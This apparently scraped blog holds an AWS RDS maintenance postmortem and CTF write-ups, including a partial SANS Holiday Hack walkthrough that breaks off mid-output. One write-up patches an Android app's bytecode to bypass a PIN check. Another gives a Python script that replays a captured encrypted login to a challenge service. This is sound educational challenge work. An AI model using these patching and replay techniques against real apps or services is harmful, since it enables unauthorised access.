Chris's Security and Tech Blog

Ordering matters - the case of the slow RDS snapshots

Thu, 16 Mar 2023 00:00:00 +0000

Introduction

At Gearset, we have a modest fleet of PostgreSQL (“Postgres”) database instances running in Amazon Web Services’s (AWS’s) Relational Database Service (RDS) offering. These database instances hold data for the variety of services that comprise our product and internal systems and they run across several geographic regions, in our production, staging, and other environments.

We run all of our databases in a configuration known as multi-AZ, where AZ stands for “Availability Zone”. Essentially, a database instance actually has two instances behind the scenes with replication between them that allows us to fail over from one to the other manually or automatically in an attempt to increase availability during upgrades or hardware failure, etc.

We regularly have to perform maintenance on these database instances to install operating system updates, upgrade the database engine, or change certain aspects of their configuration which cannot be done without a reboot.

Some parts of Gearset can have their databases upgraded during working hours, either because they back internal-facing systems (where downtime is less of a concern), or because they back services which, despite being customer-facing, are resilient to storage-layer outages.

Naturally, we began this maintenance cycle by upgrading databases backing the less finicky parts of Gearset.

It’s a good job we did, because it has turned up an interesting problem in our approach to maintenance this time around, which, now understood, should save us a great deal of time when we move on to the more critical components - the ones where we have to do it out of hours in order to reduce the impact on our customers.

This isn’t the first time we’ve performed maintenance on our RDS Postgres instances where it required downtime. We’ve been through several minor and major upgrade cycles, we’ve installed OS patches, we’ve seen it all before - or so we thought. Outside of those maintenance windows, due to the less resilient parts of the platform, we opt out of anything that could trigger otherwise-avoidable reboots or failovers of some of our database instances.

This maintenance window, we’re doing something we’ve never done before; we’re both installing OS patches and doing a minor engine upgrade.

The plan

The plan that we’ve been following this time around was as follows:

take a manual snapshot of the target instance (with the understanding that this would expedite the automatic snapshot(s) that we knew would later occur as part of the upgrade process, since RDS snapshots are essentially incremental)
kick off the OS patching process and wait until that was done
kick off the minor version upgrade from one version of Postgres to another

If at this point you’re screaming at this blog post about what’s going to go wrong, we’re hiring.

The outcome

For one of a our medium-sized instances, with only a few terrabytes of allocated storage, the initial manual snapshot took 15 minutes. This was a little longer than we expected - the automated snapshot for that instance only took a couple of minutes earlier that morning, and it had received far less traffic than unusual in the meantime - but we didn’t think this was a problem because we didn’t have to take the internal applications that relied on this database instance offline yet.

Once the manual snapshot was finished, we took the dependent applications offline and applied the OS patches. This only took a few minutes.

So far, so good.

Then we requested the minor database engine version upgrade.

A minor version upgrade involves automatic snapshots before and after the actual engine upgrade - we knew this, it was the reason we’d taken manual snapshots earlier - so that it would be quick.

The pre-upgrade snapshot took 4 hours.

Whilst this was an internal-facing application, its availablility was still fairly important to our sales team. The “one hour” of expected downtime that we promised them stretched into nearly five hours of unexpected downtime, and impacted their ability to do their job.

Oops.

Let’s do it again

We chalked this up to an idiosyncracy of RDS - it’s a managed service, you don’t know what quotas or burst balances might have impacted us. We promised that we wouldn’t take down that application for that long again in the future, and moved on after a fruitless discussion about what might have gone wrong.

Then another team in Gearset followed the same process for a much larger database instance, backing a customer-facing service. Same approach, worse consequences. The upgrade took nearly 12 hours, most of which was once again spent taking that automatic pre-upgrade snapshot.

What’s going on?

We are a few days away from having to take Gearset offline in order to upgrade the databases which are on the critical path. Early start on a Saturday morning, usually takes a few hours under the best of circumstances, and we’ve got the snapshot demon taunting us. At this point, it feels like we’ve accepted that we may never know the cause of The Snapshots From Hell.

I’m on a call with my teammate today, Barry Leonard. We’re chatting off-hand about the incidents behind us, the risk ahead of us, and what options we have at our disposal on the day if it doesn’t go our way.

And a very fortuitous conversation it was.

AZ this, snapshot that, instance here, replication there…

And then epiphany struck; a set of facts:

multi-AZ databases run in two AZ in a given region: a primary and a secondary which get failed over between (the primary becomes the secondary, and vice versa, after a failover)
we don’t do multi-AZ failovers very often, if we can avoid it
snapshots, both manual and automatic, are taken against the secondary
snapshots live in a single AZ: the “speed” advantage of having a previous snapshot is reliant on topology
OS patches cause a failover from the primary to the secondary, but not back again afterwards
minor version upgrades take a snapshot of the secondary, and upgrade both the primary and secondary, then take another snapshot of the secondary, no failing over.

What had been happening was this: a given multi-AZ instance had the primary running in a certain AZ for a long time; we kicked off a snapshot for that instance which lived in the zone of the secondary instances (let’s say, AZ1); we kicked off OS upgrades and caused a failover to the instance in AZ2; then when we kicked off the minor version upgrade it triggered a snapshot of the instance in AZ2, which had no recent snapshots to be “quickly incremental” against.

What makes this even more confusing is that AWS’s documentation says that the snapshots happen against the secondary instance (and their support confirmed this to us whilst we were trying to understand what had happened with our first two upgrades), but the AWS Console shows the AZ for the primary and the AZ of the snapshots as being all in the primary region - I’m not sure if this is a case of poor documentation or a case of the Console trying to show a “less confusing” view.

The solution

So what are we going to do on Saturday?

Well, now that we know that ordering matters, for each of the database instances we are performing maintenance on, after the OS patch we’re going to trigger a reboot with failover before applying the minor database upgrade. This should ensure the automated snapshots happen in an AZ where they have a recent snapshot to derive from, which should hopefully result in a much quicker process and less downtime for our customers. Wish us luck! (I will update this post if it all goes terribly wrong…)

Update (2023-03-27)

We intentionally performed a failover between the OS patches and the minor version upgrades on the big day - it went exactly as we’d hoped! Very little time spent on the automated snapshots, and they were taken in the same region that the previous several automated snapshots had happened in. This saved us a great deal of time and meant that our customers could get back to doing their critical Salesforce deployments over the weekend as they had originally planned.

CyberThreat18 CTF challenge write-up - "Binary A"

Fri, 02 Mar 2018 00:00:00 +0000

Introduction

I recently attended a new cyber security conference in London called CyberThreat18 hosted by the National Cyber Security Centre and SANS Institute.

Over the two-day period, the event included a Capture The Flag (CTF) competition, broken into four sessions, in which teams and individuals raced to crack the challenges and collect the most points.

This is a write-up of one of the challenges called “Binary challenge A”, and the methods used here were taken from an excellent two-part blog post series by @edskoudis on the SANS Penetration Testing blog.

Challenge description

We’re given a link to download a zip file which contains the challenge assets; a single Android application package file (APK) named ncscpin.apk.

Installing the application into a Genymotion virtual Android device (helpfully, Genymotion starts an instance of ADB server with the virtual device available, so we can just do adb install ncscpin.apk and we’re good to go) we end up with an app called NCSCPin. Firing it up, we are presented with a 5-digit pin entry dialogue. Entering a random guess such as 12345 gives us a toast notification informing us that the pin was incorrect. Moreover, it doesn’t seem like you can attempt to enter the PIN twice without closing the application and killing it from it’s suspended mode.

Clearly brute-forcing it is out of the question, so it’s time to get creative.

Pulling apart the APK

Using the excellent Apktool we can pull apart the APK and have the application’s dex bytecode decompiled into smali files.

$ apktool d -r ncscpin.apk
I: Using Apktool 2.3.1 on ncscpin.apk
I: Copying raw resources...
I: Baksmaling classes.dex...
I: Copying assets and libs...
I: Copying unknown files...
I: Copying original files...
$ tree -L 1 ncscpin
ncscpin
├── AndroidManifest.xml
├── apktool.yml
├── lib
├── original
├── res
├── resources.arsc
└── smali

4 directories, 3 files

Note the use of the -r flag to avoid decoding the package’s resources - we don’t need to modify these, and you can sometimes hit issues trying to rebuild the APK if the resources have been decoded. By not decoding them, they will simply be copied in their original form when rebuilding the package.

Apktool has created a few directories for us here, and the one we’re interested in is smali, which is where it has placed the decompiled application code.

Patching the app

Of interest to us in particular are the two MainActivity files in smali/com/example/mainuser/ncscpin - these are essentially the equivalent of an entrypoint for an Android application.

In MainActivity.smali we can see a virtual method defined called isPinCorrect - sounds interesting!

.method public native isPinCorrect(Ljava/lang/String;)Z
.end method

In MainActivity$1.smali we can see where this function is called from and a conditional jump on the value it returns:

invoke-virtual {v0, v1}, Lcom/example/mainuser/ncscpin/MainActivity;->isPinCorrect(Ljava/lang/String;)Z

move-result v0

if-eqz v0, :cond_0

By changing the conditional jump instruction from if-eqz to if-nez we can essentially reverse the PIN validation so that entering anything other than the “correct” PIN (which we don’t know) will be treated as a correct attempt.

Rebuilding, signing, installing

Now that we’ve made our desired change, we can rebuild the package, again using Apktool, which places the rebuild package in the dist folder under our top level extraction directory.

$ apktool b ncscpin
I: Using Apktool 2.3.1
I: Checking whether sources has changed...
I: Smaling smali folder into classes.dex...
I: Checking whether resources has changed...
I: Copying raw resources...
I: Copying libs... (/lib)
I: Building apk file...
I: Copying unknown files/dir...
$ tree ncscpin/dist/
ncscpin/dist/
└── ncscpin.apk

0 directories, 1 file

Unfortunately, we can’t just deploy this new APK file as it currently stands - attempting to do so gives us the following error

$ adb install ncscpin/dist/ncscpin.apk
adb: failed to install ncscpin/dist/ncscpin.apk: Failure [INSTALL_PARSE_FAILED_NO_CERTIFICATES: Failed to collect certificates from /data/app/vmdl1069109607.tmp/base.apk: Attempt to get length of null array]

We need to sign our APK file, and in order to do that we need to generate a key and certificate for ourselves. We’ll do the key and certificate generation and signing using the Java keytool and jarsigner tools respectively.

$ keytool -v -genkey -keystore ncscpin.keystore \
>            -alias NCSCPin \
>            -keyalg RSA \
>            -keysize 1024 \
>            -sigalg SHA1withRSA \
>            -validity 356
Enter keystore password:  
Re-enter new password:
What is your first and last name?
  [Unknown]:  Chris Moore
What is the name of your organizational unit?
  [Unknown]:  
What is the name of your organization?
  [Unknown]:  
What is the name of your City or Locality?
  [Unknown]:  
What is the name of your State or Province?
  [Unknown]:  
What is the two-letter country code for this unit?
  [Unknown]:  
Is CN=Chris Moore, OU=Unknown, O=Unknown, L=Unknown, ST=Unknown, C=Unknown correct?
  [no]:  yes

Generating 1,024 bit RSA key pair and self-signed certificate (SHA1withRSA) with a validity of 356 days
        for: CN=Chris Moore, OU=Unknown, O=Unknown, L=Unknown, ST=Unknown, C=Unknown
[Storing ncscpin.keystore]

Now we can use this keystore to sign our APK file

$ jarsigner -keystore ncscpin.keystore \
>           -sigalg SHA1withRSA \
>           -digestalg SHA1 NCSCPin \
>           ncscpin/dist/ncscpin.apk
Enter Passphrase for keystore:
jar signed.

Warning:
The signer's certificate is self-signed.
No -tsa or -tsacert is provided and this jar is not timestamped. Without a timestamp, users may not be able to validate this jar after the signer certificate's expiration date (2019-02-21).

Now that we’ve signed our APK file, we can install it into our virtual Android device. Note that we have to uninstall the existing application first, as we haven’t gone to the effort of giving the application a valid update path.

$ adb uninstall com.example.mainuser.ncscpin
Success
$ adb install ncscpin/dist/ncscpin.apk
Success

Finally, we can fire up our modified version of the application inside the virtual Android device, enter our dummy PIN of 12345 and we get a toast notification containing the flag of HooksArentJustForPirates!

Closing remarks

A massive thank you goes to the team at Helical Levity for putting together the pre-conference challenges and this CTF, as well as to James Lyne and the folks at SANS EMEA and the National Cyber Security Centre for making this awesome conference happen.

CyberThreat18 CTF challenge write-up - "Network A"

Thu, 01 Mar 2018 00:00:00 +0000

Introduction

I recently attended a new cyber security conference in London called CyberThreat18 hosted by the National Cyber Security Centre and SANS Institute.

Over the two-day period, the event included a Capture The Flag (CTF) competition, broken into four sessions, in which teams and individuals raced to crack the challenges and collect the most points.

This is a write-up of one of the challenges called “Network challenge A”.

Challenge description

We’re given a link to download a zip file which contains the challenge assets; a packet capture file (PCAP) named somepcap.pcapng and an RSA private key file in PEM format named somepem.pem. We’re also instructed that the flag we require needs to be acquired from “the service” running on ctf-ch7.cyberthreat2018.com. Time to crack open the PCAP!

PCAP analysis

Opening the PCAP, we see a single TCP conversation between two hosts; a client and what we can safely assume to be “the service” alluded to from the challenge description, which in the PCAP appears to be running on port 31337.

Following the TCP conversation in Wireshark, we see the following:

Coloured blue is the data sent by the service to the client, and coloured red is the data sent by the client to the service.

At the beginning of the conversation, we see the service sent the client an RSA public key, followed by the client also sending the service an RSA public key. What follows that is… gibberish, to the best of our current estimations. Showing the data as a hexdump instead, however, reveals a bit more structure to us…

In particular, we see that the messages exchanged between the client and the service (after the exchanging of public keys) are always of a fixed size - 256 bytes (or 2048 bits).

This is noteworthy, because the public keys that were exchanged were 2048-bit keys, and a property of asymmetric algorithms is that the size of the data which you wish to encrypt with it cannot exceed the key size. Another property of asymmetric encryption is that the size of the encrypted data “going in” matches the size of the data “coming out”.

At this point, we might theorize that the messages exchanged are encrypted asymetrically using RSA, with a high likelihood that the plaintext is padded to the 2048 bits in length prior to encryption. Specifically, when the client wishes to send a message to the service, it pads it, and RSA-encrypts it using the public key which was sent to it by the service at the start of the conversation, and vice versa for service to client communications.

Taking a peek at the data

Recall that, as well as the PCAP file, we were also provided with a RSA private key file, called somepem.pem.

From this private key file, we can calculate the corresponding public key using the openssl tool.

$ openssl rsa -in somepem.pem -pubout
writing RSA key
-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAjIlaZyLpXHCodCbhSREA
mpRP9vjBqELq5AodBu7zXCjZspyb/jTNGzEek4QWvqIosoZ5MDgAK1TRUG8R4Hqh
qaz19cuD1quOovKRqqJEgaRsbRx8uW5vjsG6ge6kBJk9EOlkJe3COqXzsJWTIKc0
GeHfnp88v4C1Qge3BX3bQ7K4prcAWyxGEsh14bQ/oFY4MIq0aAr4+dzYP/hWxCqt
Jz8m3R5bOW/k2J7O8a9c8A7DVM6/HGIaKyLrLNuAqwhLFJM32jSLiGOxfDHDE1Aq
/QGjEPUImUXVRok7nHjbNIDJNNCbCLzr/rWGEYVWUTia/wPcUpYVv9S5/BdiTA5s
PQIDAQAB
-----END PUBLIC KEY-----

A-ha, this is the same as the public key which was sent from the client to the service in our packet capture, which means that we should be able to decrypt the messages in one of the directions in the TCP conversation - those from the service to the client.

Let’s attempt to decrypt the first encrypted message from the service to the client. By switching to the YAML view in Wireshark’s we can grab the first message in Base 64 encoded form, and experiment with openssl’s rsautl mode to try to decrypt it.

$ echo ZLgeZ+9IuHmxqfdMfOb/CdaWo/xK6hzHz0HDAXBSST2PfwqPGJ0Ly+P8q/ZwfGoD7n9LxL8p+m+f \
       k1K41QYpKphoAp+zioORUU9qDlq64ht+IWn30FKnmVaJokwUpMLnY10gPYD1MEQQFWhbIlXYSpCZ \
       X/xVvOr/emXn+xkg1KAY8q4vG5n02vmF1Rmp5ltBpqm2PqCBXDHDRO6g2259RF4NAkhF3+y+DrCK \
       /8NTVFhDVRFm5QZ0BLCWUfFJwLLFpzbIv/Q/FlnZuA87d/lgpGYZ3ajHCGHbcOdcjoanYdzGY2v3 \
       Zh5iPm6L5AviusEii2VVcT3aQkMvLybPEHyjpw== | \
>   openssl base64 -d | \
>   openssl rsautl -inkey somepem.pem -oaep -decrypt
Commands:

quit
authenticate
adduser
help
getflag

Bingo! The padding employed is PKCS#1 OAEP. We repeat this on the other messages sent from the service to the client to get the rest of this side of the conversation. I’ve used the convention of writing > ??? to indicate the unknown client message, with the server response immediately below.

> ???
Commands:

quit
authenticate
adduser
help
getflag
> ???
Insufficient permissions! Please authenticate and try again.
> ???
Authentication successful.
> ???
User successfully added!

Getting interactive

At this point, we can throw together a small (terribly written!!) python script to interact with the service directly, which according to the challenge description is running on ctf-ch7.cyberthreat2018.com, most likely on port 31337 according to the PCAP.

from Crypto.Cipher import PKCS1_OAEP as cip
from Crypto.PublicKey import RSA
import socket
import base64

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("ctf-ch7.cyberthreat2018.com", 31337))

their = s.recv(1024)
their_key = RSA.importKey(their)

f = open('somepem.pem', 'r')
our_key = RSA.importKey(f.read())

our_public = our_key.publickey().exportKey()

s.send(our_public)

def enc(plain):
    cipher = cip.new(their_key)
    crypt = cipher.encrypt(plain)
    return crypt

def dec(crypt):
    cipher = cip.new(our_key)
    plain = cipher.decrypt(crypt)
    return plain

while True:
    cmd = raw_input("> ")
    s.send(enc(cmd))
    print dec(s.recv(256))

Yes, I know that’s not how you should send and receive with python’s sockets. Yes, I’m using s globally. Yes, some of the naming is poor. Under CTF conditions, this is as good as you’re going to get ;P.

So, we execute our client, run the getflag command, and we’re done right? Right?

$ python client.py
> getflag
Insufficient permissions! Please authenticate and try again.

Damn, we don’t have any credentials for this service. We can’t see the credentials that were used in the PCAP because we don’t have the RSA private key corresponding to the service’s public key (which the client uses to encrypt traffic in that direction). So what are we to do?

Could you repeat that please?

At this point, I lost a lot of time in the CTF trying various methods of authenticating with the service; I extended my python script to brute-force credentials using the rockyou wordlist (this was slow, and bore no fruit), I tried using the adduser command with parameters of varying sizes in case there was an overflow onto some hypothetical is_authenticated variable on the stack, I tried to search online for the fingerprint of the service’s RSA public key in case it had been chosen from the set of weak RSA keys from back when Debian’s PRNG for key generation was broken. No dice.

“Have you considered a replay attack?”

🤦

Of course, the answer was the take the message which the client sent to the service immediately before it responded with Authentication successful. and send it to the service before dropping us into our interactive session - that way we would be logged in, and be able to request the flag.

from Crypto.Cipher import PKCS1_OAEP as cip
from Crypto.PublicKey import RSA
import socket
import base64

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("ctf-ch7.cyberthreat2018.com", 31337))

their = s.recv(1024)
their_key = RSA.importKey(their)

f = open('somepem.pem', 'r')
our_key = RSA.importKey(f.read())

our_public = our_key.publickey().exportKey()

s.send(our_public)

def enc(plain):
    cipher = cip.new(their_key)
    crypt = cipher.encrypt(plain)
    return crypt

def dec(crypt):
    cipher = cip.new(our_key)
    plain = cipher.decrypt(crypt)
    return plain

login_replay = """dWVSS7A86P0D8b0Ce85Z8Bg6phb3uEWIVJCyoGtp3KjQqbDfxTGweVz+aseNwF9J38msGRZt8Ox6
                  Beyb6d70jByoLNoyVyx7Ws4/lxx2TyauSs/iUcaVF9YvWW87K9QGbInQTjrMBgi2Z5WhL/HNF5Am
                  7LIdBblz79r3t6pwI9A889t3ctZuacjcKLAn/m+0DGlnIMgQpgMLFQea7yhwyX7g65UfF1VPw/cG
                  UmuXIS0QHCpTOz1ve2WbgrBBYdn8tqMiDZySzU9IyAJF0vIVuC03Cc/gsQ+vo+84f0qOWYTmz2Z3
                  AQlbmZiewh70MaIteT3cPhKKKHMkt0AyB2Ws8A=="""

s.send(base64.b64decode(login_replay))

print dec(s.recv(256))

while True:
    cmd = raw_input("> ")
    s.send(enc(cmd))
    print dec(s.recv(256))

Et voila

$ python client.py
Authentication successful.
> getflag
AllYourDataAreBelongToUs

(Note: that wasn’t actually what the flag was - I can’t remember what it was, and the service is only accessible from within the CTF network - you can safely assume it was an equivalently nerdy quote :P)

Closing remarks

This is a good example of why you never write your own security code if you can help it. This was vulnerable to replay attacks, is succeptible to man in the middle attacks (you could sit it the middle and proxy requests, sending different public keys to the client and the service), and provides no perfect forward secrecy allowing us to decrypt the traffic in the PCAP in the first place…

Solving the SANS Holiday Hack Challenge 2017

Wed, 10 Jan 2018 00:00:00 +0000

Introduction

Every year, the folks at Counter Hack Challenges and SANS run a cyber security challenge for people to enjoy over the festive season, and once again it was great fun and very educational.

Head over to the challenge site to set the scene, have a look at the questions, and have a go for yourself before reading my solution below!

This year’s challenge came as two components: the first is the North Pole and Beyond, a game in which you progress through several levels guiding snowballs through checkpoints and over the pages of the Great Book, and tackle the terminals within those levels to earn achievements; the other is the publicly-exposed Letters to Santa system, and the internal systems behind it, which you must penetrate in order to collect the remaining pages of the Great Book and ultimately try to find out who is responsible for the villain causing the giant snowball problem.

In this blog post, I shall cover the techniques used to overcome the terminals in the North Pole and Beyond and acquitions of pages from the Great Book, as well as our journey through the Letters to Santa systems, signposting where we acquire the answers to the nine questions posted on the cha

North Pole and Beyond

Winter Wonder Landing

Great Book Page 1

This is the answer to Question 1: Visit the North Pole and Beyond at the Winter Wonder Landing Level to collect the first page of The Great Book using a giant snowball. What is the title of that page?

The first page of the Great Book could be found inside the Winter Wonder Landing level lying on the floor. By running over it with the snowball and making it to the exit, the page appears in your Stocking with the title “About This Book” (SHA1: 6dda7650725302f59ea42047206bd4ee5f928d19).

Terminal

The terminal in this level gives us the following banner

                                 |
                               \ ' /
                             -- (*) --
                                >*<
                               >0<@<
                              >>>@<<*
                             >@>*<0<<<
                            >*>>@<<<@<<
                           >@>>0<<<*<<@<
                          >*>>0<<@<<<@<<<
                         >@>>*<<@<>*<<0<*<
           \*/          >0>>*<<@<>0><<*<@<<
       ___\\U//___     >*>>@><0<<*>>@><*<0<<
       |\\ | | \\|    >@>>0<*<0>>@<<0<<<*<@<<  
       | \\| | _(UU)_ >((*))_>0><*<0><@<<<0<*<
       |\ \| || / //||.*.*.*.|>>@<<*<<@>><0<<<
       |\\_|_|&&_// ||*.*.*.*|_\\db//_               
       """"|'.'.'.|~~|.*.*.*|     ____|_
           |'.'.'.|   ^^^^^^|____|>>>>>>|
           ~~~~~~~~         '""""`------'
My name is Bushy Evergreen, and I have a problem for you.
I think a server got owned, and I can only offer a clue.
We use the system for chat, to keep toy production running.
Can you help us recover from the server connection shunning?


Find and run the elftalkd binary to complete this challenge.
elf@154af25b50a2:~$ 

Attempting to use the find command gives the error bash: /usr/local/bin/find: cannot execute binary file: Exec format error - it looks as though they have placed a find binary for the wrong platform (specifically for ARM, rather than the x86-64 architecture we’re running on) in /usr/local/bin/ to make our lives a bit more difficult. Thankfully, the correct version of find can still be found at /usr/bin/find, and we can use this to locate the elftalkd binary we’re interested in.

elf@6500a4c0a8ef:~$ /usr/bin/find / -iname elftalkd 2> /dev/null
/run/elftalk/bin/elftalkd

We can then attempt to run this elftalkd binary and we are met with success

elf@6500a4c0a8ef:~$ /run/elftalk/bin/elftalkd

        Running in interactive mode
        --== Initializing elftalkd ==--

Initializing Messaging System!
Nice-O-Meter configured to 0.90 sensitivity.
Acquiring messages from local networks...


--== Initialization Complete ==--
      _  __ _        _ _       _ 
     | |/ _| |      | | |     | |
  ___| | |_| |_ __ _| | | ____| |
 / _ \ |  _| __/ _` | | |/ / _` |
|  __/ | | | || (_| | |   < (_| |
 \___|_|_|  \__\__,_|_|_|\_\__,_|

-*> elftalkd! <*-
Version 9000.1 (Build 31337) 
By Santa Claus & The Elf Team
Copyright (C) 2017 NotActuallyCopyrighted. No actual rights reserved.
Using libc6 version 2.23-0ubuntu9
LANG=en_US.UTF-8
Timezone=UTC

Commencing Elf Talk Daemon (pid=6021)... done!
Background daemon...

Winconceivable: The Cliff of Winsanity

Terminal

The terminal in this level gives us the following banner

                ___,@
               /  <
          ,_  /    \  _,
      ?    \`/______\`/
   ,_(_).  |; (e  e) ;|
    \___ \ \/\   7  /\/    _\8/_
        \/\   \'=='/      | /| /|
         \ \___)--(_______|//|//|
          \___  ()  _____/|/_|/_|
             /  ()  \    `----'
            /   ()   \
           '-.______.-'
   jgs   _    |_||_|    _
        (@____) || (____@)
         \______||______/


My name is Sparkle Redberry, and I need your help.
My server is atwist, and I fear I may yelp.
Help me kill the troublesome process gone awry.
I will return the favor with a gift before nigh.


Kill the "santaslittlehelperd" process to complete this challenge.

Listing the running processes using ps aux gave the following output

elf@bf85d7da5620:~$ ps aux
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
elf          1  0.4  0.0  18028  2824 pts/0    Ss   18:57   0:00 /bin/bash /sbin/init
elf          8  0.0  0.0   4224   632 pts/0    S    18:57   0:00 /usr/bin/santaslittlehelperd
elf         11  2.6  0.0  13528  6328 pts/0    S    18:57   0:00 /sbin/kworker
elf         12  0.0  0.0  18248  3120 pts/0    S    18:57   0:00 /bin/bash
elf         18  8.3  0.1  71468 26520 pts/0    S    18:57   0:00 /sbin/kworker
elf         29  0.0  0.0  34424  2920 pts/0    R+   18:57   0:00 ps aux

Trying the obvious kill 8 didn’t seem to work - the santaslittlehelperd process was still running. Inpecting the /sbin/init script that got ran when this container started shows us that the program we are trying to kill was started with nohup, as well as another process /sbin/kworker.

#!/bin/bash
(nohup /usr/bin/santaslittlehelperd >/dev/null 2>&1 & disown)
(sleep 2; nohup /sbin/kworker >/dev/null 2>&1 & disown)
/bin/bash

I’m not really sure what trickery was going on here, but invoking /bin/kill 8 directly seemed to work (killing the kworker processes too)… ¯\_(ツ)_/¯

Cryokinetic Magic

Terminal

The terminal in this level gives us the following banner

                     ___
                    / __'.     .-"""-.
              .-""-| |  '.'.  / .---. \
             / .--. \ \___\ \/ /____| |
            / /    \ `-.-;-(`_)_____.-'._
           ; ;      `.-" "-:_,(o:==..`-. '.         .-"-,
           | |      /       \ /      `\ `. \       / .-. \
           \ \     |         Y    __...\  \ \     / /   \/
     /\     | |    | .--""--.| .-'      \  '.`---' /
     \ \   / /     |`        \'   _...--.;   '---'`
      \ '-' / jgs  /_..---.._ \ .'\\_     `.
       `--'`      .'    (_)  `'/   (_)     /
                  `._       _.'|         .'
                     ```````    '-...--'`

My name is Holly Evergreen, and I have a conundrum.
I broke the candy cane striper, and I'm near throwing a tantrum.
Assembly lines have stopped since the elves can't get their candy cane fix.
We hope you can start the striper once again, with your vast bag of tricks.


Run the CandyCaneStriper executable to complete this challenge.

Listing the contents of the current directory, we can see the executable we want to run, however it is owner by root and does not have the executable bit set

elf@8285dbdfda37:~$ ls -la
total 68
drwxr-xr-x 1 elf  elf   4096 Dec 15 20:00 .
drwxr-xr-x 1 root root  4096 Dec  5 19:31 ..
-rw-r--r-- 1 elf  elf    220 Aug 31  2015 .bash_logout
-rw-r--r-- 1 root root  3143 Dec 15 19:59 .bashrc
-rw-r--r-- 1 elf  elf    655 May 16  2017 .profile
-rw-r--r-- 1 root root 45224 Dec 15 19:59 CandyCaneStriper

One thing we could do, since we can read the contents of the file, is to copy it (since then it would be owned by us) and use chmod to set the executable flag, however it looks like the chmod binary itself has been replaced with an empty file!

elf@8285dbdfda37:~$ file /bin/chmod
/bin/chmod: empty

Inspecting the executable file we wish to run using the file command, we see the following

elf@8285dbdfda37:~$ file CandyCaneStriper 
CandyCaneStriper: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=bfe4f
fd88f30e6970feb7e3341ddbe579e9ab4b3, stripped

which is to say that it is a dynamically linked ELF binary, so what we can do is invoke the /lib64/ld-linux-x86-64.so.2 linker directly with the CandyCaneStriper binary as its argument

elf@74db47a71ead:~$ /lib64/ld-linux-x86-64.so.2 ./CandyCaneStriper
                   _..._
                 .'\\ //`,      
                /\\.'``'.=",
               / \/     ;==|
              /\\/    .'\`,`
             / \/     `""`
            /\\/
           /\\/
          /\ /
         /\\/
        /`\/
        \\/
         `
The candy cane striping machine is up and running!

There’s Snow Place Like Home

Terminal

The terminal in this level gives us the following banner

                             ______
                          .-"""".._'.       _,##
                   _..__ |.-"""-.|  |   _,##'`-._
                  (_____)||_____||  |_,##'`-._,##'`
                  _|   |.;-""-.  |  |#'`-._,##'`
               _.;_ `--' `\    \ |.'`\._,##'`
              /.-.\ `\     |.-";.`_, |##'`
              |\__/   | _..;__  |'-' /
              '.____.'_.-`)\--' /'-'`
               //||\\(_.-'_,'-'`
             (`-...-')_,##'`
      jgs _,##`-..,-;##`
       _,##'`-._,##'`
    _,##'`-._,##'`
      `-._,##'`
      
My name is Pepper Minstix, and I need your help with my plight.
I've crashed the Christmas toy train, for which I am quite contrite.
I should not have interfered, hacking it was foolish in hindsight.
If you can get it running again, I will reward you with a gift of delight.


total 444
-rwxr-xr-x 1 root root 454636 Dec  7 18:43 trainstartup

Attempting to run the trainstartup executable gives us an error, bash: ./trainstartup: cannot execute binary file: Exec format error, indicating that this binary is not for this platform.

Using the file to find out what platform it is for show that it is a 32-bit ARM binary, whereas we are running on a 64-bit x86-64 platform

elf@c1db16b4b906:~$ file trainstartup 
trainstartup: ELF 32-bit LSB  executable, ARM, EABI5 version 1 (GNU/Linux), statically linked, for GNU/Linux 3.2.0, BuildID[sha1]=005de4685e8563d10b3de3e0be7d6fdd7ed732eb, not stripped

Thankfully for us, this container ships with QEMU, in particular the QEMU ARM machine emulator that will translate the instructions in our trainstartup binary for us and allow us to execute it

elf@c1db16b4b906:~$ qemu-arm trainstartup 
Starting up ...

    Merry Christmas
    Merry Christmas
v
>*<
^
/o\
/   \               @.·
/~~   \                .
/ ° ~~  \         · .    
/      ~~ \       ◆  ·    
/     °   ~~\    ·     0
/~~           \   .─··─ · o
             /°  ~~  .*· · . \  ├──┼──┤                                        
              │  ──┬─°─┬─°─°─°─ └──┴──┘                                        
≠==≠==≠==≠==──┼──=≠     ≠=≠==≠==≠==≠==≠==≠==≠==≠==≠==≠==≠==≠==≠==≠==≠==≠==≠===≠
              │   /└───┘\┌───┐       ┌┐                                        
                         └───┘    /▒▒▒▒                                        
≠==≠==≠==≠==≠==≠==≠==≠==≠==≠==≠==≠=°≠=°≠==≠==≠==≠==≠==≠==≠==≠==≠==≠==≠==≠==≠==≠




You did it! Thank you!

Bumbles Bounce

Great Book page 5

This level contains another page from the Great Book which can be acquired by rolling over it with a snowball and reaching the exit. This is page 5, entitled “The Abominable Snow Monster” (SHA1: 05c0cacc8cfb96bb5531540e9b2b839a0604225f)

Terminal

The terminal in this level gives us the following banner

      ''   /o\   ''     '.|  |.'      \/ //><\\ \/
           ':'        . ~~\  /~~ .       _//\\_
jgs                   _\_._\/_._/_      \_\  /_/ 
                       / ' /\ ' \                   \o/
       o              ' __/  \__ '              _o/.:|:.\o_
  o    :    o         ' .'|  |'.                  .\:|:/.
    '.\'/.'                 .                 -=>>::>o<::<<=-
    :->@<-:                 :                   _ '/:|:\' _
    .'/.\'.           '.___/*\___.'              o\':|:'/o 
  o    :    o           \* \ / */                   /o\
       o                 >--X--<
                        /*_/ \_*\
                      .'   \*/   '.
                            :
                            '
Minty Candycane here, I need your help straight away.
We're having an argument about browser popularity stray.
Use the supplied log file from our server in the North Pole.
Identifying the least-popular browser is your noteworthy goal.
total 28704
-rw-r--r-- 1 root root 24191488 Dec  4 17:11 access.log
-rwxr-xr-x 1 root root  5197336 Dec 11 17:31 runtoanswer

This one was just a bit of trial and error with our usual go-to command line tools for manipulating text-based data, namely cut, sort and uniq

elf@15b12bd7b9ec:~$ cut -d '"' -f 6 access.log | sort | uniq -c | sort -nr | tail
Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Trident/6.0; MASMJS)
Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)
Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
